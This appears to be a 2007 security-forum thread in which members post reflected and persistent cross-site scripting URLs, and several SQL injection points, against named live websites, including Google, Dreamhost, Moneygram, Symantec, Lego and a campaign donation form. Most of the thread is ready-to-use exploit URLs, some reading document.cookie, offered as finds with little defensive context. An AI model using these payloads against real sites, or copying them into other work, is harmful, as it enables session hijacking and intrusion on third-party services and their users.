so what good does my taxpayer money do if the FBI can't even protect their own site? O.O

http://www.rot13.com/?text=</GrKgNerN><fpevcg ynathntr="wninfpevcg">nyreg('KFF ol Eblny2000U');</fpevcg>

</GrKgNerN><fpevcg ynathntr="wninfpevcg">nyreg('KFF ol Eblny2000U');</fpevcg> = the rot13 of </TeXtAreA><script language="javascript">alert('XSS by Royal2000H');</script>

:)

Royal2000H Wrote:
-------------------------------------------------------
> http://www.rot13.com/?text=nyreg('KFF ol
> Eblny2000U');
>
> nyreg('KFF ol Eblny2000U'); = the rot13 of
> alert('XSS by Royal2000H');
>
> :)

nice :O

POST XSS at www.ronpual2008.com compliments of http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.ronpaul2008.com/forms/contributepost.cfm&RP_comment=%3C/textarea%3E%3Cscript%3Ealert(0)%3C/script%3E&RP_title=foo&RP_first_name=a&RP_last_name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&RP_mi=a&RP_address1=a&RP_address2=&RP_state=CA&RP_zip=90210&RP_city=gotham&RP_phone=&RP_phone_alt=&RP_email=&RP_employer=&RP_occupation=&RP_donation_total=-20&RP_recurring_charge=no&RP_number_of_payments=1&RP_cc_number=4111111111111111&RP_CC_expiration_month=12&RP_CC_expiration_year=12&RP_CC_security_code=000

Some random skinhead website XSS. I hate skinheads.

http://www.skinheadz.com/cgi-bin/contact/skinlist.cgi

Add this in any of the boxes, except for background:

"><script>alert('XSS')</script>

One of the many vulnerabilities on that website.

http://search2.lego.com/exec/?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&pt=initial&lang=2057&cc=US&u=

http://www.batelco.jo/pages.php?menu_id=71&local_type=0&local_id=0&local_details=0&local_details1=0&localsite_branchname=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E%3C/

ISP in Jordan.
Doesn't seem to work without the /s in the alert.

EDIT: Honda XSS
http://search.hondacars.com/Default.asp?ui_mode=question%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&question_box=



Edited 1 time(s). Last edit at 05/29/2007 04:54PM by Mongo.

http://mail.google.com/support/bin/static.py?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%3Cnull%3D%22

Not sure who to give credit to, because I doubt the person that sent it to me found it.



Edited 1 time(s). Last edit at 05/31/2007 12:49PM by Ghozt.

Wow nice one, and so obvious! it's not Google's month I guess with all these new holes. ^^

Warning, there are many alerts that pop up.

http://4kids.tv/shop/index.php?pid=36&skin=&type=1%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E



Edited 1 time(s). Last edit at 05/31/2007 04:13PM by Mongo.

Ghozt That's a nice find!

But it seems to be fixed.

http://www.lexisnexis.com/trial/contactrepnalm.asp?ProductName=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%75%68%20%6F%68%22%29%3B%3C%2F%73%63%72%69%70%74%3E

two alerts

#&

http://www.blackflag.com/where_to_buy/?address=%22%3E%3Cscript%3Ealert%28%27Raid+Is+Better+%3Do%29%27%29%3C%2Fscript%3E

http://www.moneygram.com/eHowMuch/howMuch.do?countryCode=US&languageCode="><script>alert("Nemessis-www.rstzone.net")</script>.com

My first disclosure :)


http://photobucket.com/images/%22%3E%3CBODY%20ONLOAD=alert(123)%3E/

Wow, so much has happened... Been gone for a bit... hope everyone is well

Here's one I "stumbled" upon while checking out my 2nd fav site (apart from here of course)

http://www.ufc.com/index.cfm?fa=search.results&ss=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2873%2C+83%2C+69%2C+67%2C+58%2C+88%2C+83%2C+83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D

I picked up the book today!! Looking forward to reading it on those long flights.

ISEC



Edited 1 time(s). Last edit at 06/04/2007 08:41PM by pheusion.

Dreamhost 0year's

User panel:
https://panel.dreamhost.com/index.cgi?Nscmd=Nlogin&username=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&password=

Knowledge base:
https://panel.dreamhost.com/kbase/index.cgi?Nscmd='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C%22



Edited 1 time(s). Last edit at 06/04/2007 09:04PM by Ronald.

Ronald Wrote:
-------------------------------------------------------
> User panel:
> https://panel.dreamhost.com/index.cgi?Nscmd=Nlogin
> &username=%22%3E%3Cscript%3Ealert%28document.cooki
> e%29%3B%3C%2Fscript%3E%3C%22&password=

Already found =oP http://sla.ckers.org/forum/read.php?11,10371,10388#msg-10388

http://www.ct.gov/dps/cwp/eMailPage.asp

Several hits, having issue with posting the url though
ISEC

EDIT:

Add the DMV section to the list:

http://search.dmv.org/search?w=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%3E%3C/SCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2873%2C+83%2C+69%2C+67%2C+58%2C+88%2C+83%2C+83%29%29%3C/SCRIPT%3E%3D%26%7B%7D&tz=CT&state=CONNECTICUT&section=STATE+HOME



Edited 3 time(s). Last edit at 06/04/2007 09:31PM by pheusion.

Oh ok, well I was passing by and don't think I'm gonna read all the posted holes here ^^.

Here, an SQL injection for free:

http://discussion.dreamhost.com/search.pl?Cat='

Jokers!

add the : ' at the end.

persistent xss on livevideo.com.

1. Create livevideo account
2. Navigate to Edit Channel Appearance
3. add <img src="//," onError=alert(1);>
4. ???
5. Profit!!!

#&

Oh the irony:
http://linkscanner.explabs.com/linkscanner/checksite.asp?NS=ChkOnly&SRC=apps.ExpLabs.com&CS=<script>alert("LOL Irony");</script>

http://securityresponse.symantec.com/security_response/detected_writeup.jsp?name=<script>alert(":)");</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Another one on torrent site. 3 times on one page, whats the most reflected attacks on one page that someones ever seen?

http://torrentfreak.com/?s=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E




tr1pp33 - Need a Sig



Edited 1 time(s). Last edit at 06/06/2007 02:13PM by tr1pp33.

> whats the most reflected attacks on one page that
> someones ever seen?

I wouldn't know, after holding down the 'enter' key to go through the alerts I got tired and ended up having to close the browser.

http://www.menshealth.com/cda/article.do?site=MensHealth&channel=health&category=metrogrades%22%3E%3Cscript%3Ealert(0)%3C/script%3E&conitem=16d03453117f2110VgnVCM20000012281eac____ (3 clicks) and womenshealth.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.womenshealth.com/productsearch.jsp&term=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

http://www.lewt.com/index.php?keywords=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C/&x=0&y=0&cp=advanced_search&keyword=%27%27%3B%21--&%7B%28%29%7D=&gid=&server_id=&category_id=

Not sure if it's a repost, since it should affect most "WebSideStory infected" web sites, but...

http://www.pcworld.com/article/id,132153/article.html?lang=';alert(String.fromCharCode(88,83,83))//

RSnake quoted on page 2 :D

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

http://linkscanner.explabs.com/linkscanner/checksite.asp?NS=ChkOnly&SRC=apps.ExpLabs.com&CS='

more irony, sql injection point. ;)

http://www.zeropaid.com/php/search/index.php?q=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Cp%20%22&sa=Search ouch, sql too http://www.zeropaid.com/news/index.php?category=' .


http://www.istockphoto.com/file_search.php?action=file&text=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C
http://www.istockphoto.com/user_view.php?id=1%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Cp%20id=%22

btw, can anyone got any insight into this behavior: h++p://www.istockphoto.com/user_view.php?id=1--

for some reason entering [number]-- as the id completely wrecks FF's rendering of the page (FF 2.0.0.4 XP). There doesn't seem to be any reason for this though :\
And it doesn't seem to happen in IE6, confirm?

EDIT: I'll post this as a different topic.

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 06/08/2007 07:16PM by tx.